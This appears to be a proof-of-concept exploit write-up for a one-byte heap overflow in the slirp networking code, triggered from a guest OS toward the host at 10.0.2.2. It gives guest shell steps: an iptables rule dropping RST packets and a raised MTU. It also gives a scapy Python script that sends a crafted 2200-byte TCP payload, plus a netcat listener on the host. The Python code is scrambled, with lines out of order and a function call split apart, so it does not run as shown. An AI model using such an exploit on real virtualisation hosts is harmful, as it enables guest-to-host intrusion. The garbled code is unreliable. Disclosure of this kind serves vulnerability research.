```shell
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.0.2.2 -j DROP # Because we will use Python to construct tcp packets, this will prevent the kernel from sending rst packets.
# ip link set ens3 mtu 3000 # When the sending size is larger than the default mtu packet, the slipr_input function allocates space from the heap, and then we can overflow one byte of the heap space
# ./poc
```
poc:
```python
#!/usr/bin/python3
import os
import time
from scapy.all import *
target_ip = '10.0.2.2'
target_port = 7070
def start_tcp( target_ ip,target_ port,str_ to_send) : dst=target_ ip)/TCP( dport=target_ port,sport= RandShort( ),seq=RandInt( ),flags= 0x2),verbose= False)
global sport,s_seq,d_seq
try:
ans = sr1(IP(
sport = ans[TCP].dport
s_seq = ans[TCP].ack
d_seq = ans[TCP].seq+1
except Exception as e:
print(e)
if __name__ == '__main__':
buf = ['R' for n in range(2200)];
buf_len = len(buf);
buf[ buf_len- 10]= chr(0x50) tcp(target_ ip,target_ port,"" .join(buf) )
buf[buf_len-9] = chr(0x4e)
buf[buf_len-8] = chr(0x41)
buf[buf_len-7] = chr(0x00)
buf[buf_len-1] = chr(27)
start_
```
In host OS run:
```shell
nc -l -p 7070
```
In guest OS run:
```shell
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 10.0.2.2 -j DROP # Because we will use Python to construct tcp packets, this will prevent the kernel from sending rst packets.
# ip link set ens3 mtu 3000 # When the sending size is larger than the default mtu packet, the slipr_input function allocates space from the heap, and then we can overflow one byte of the heap space
# ./poc
```
This will cause a byte heap overflow.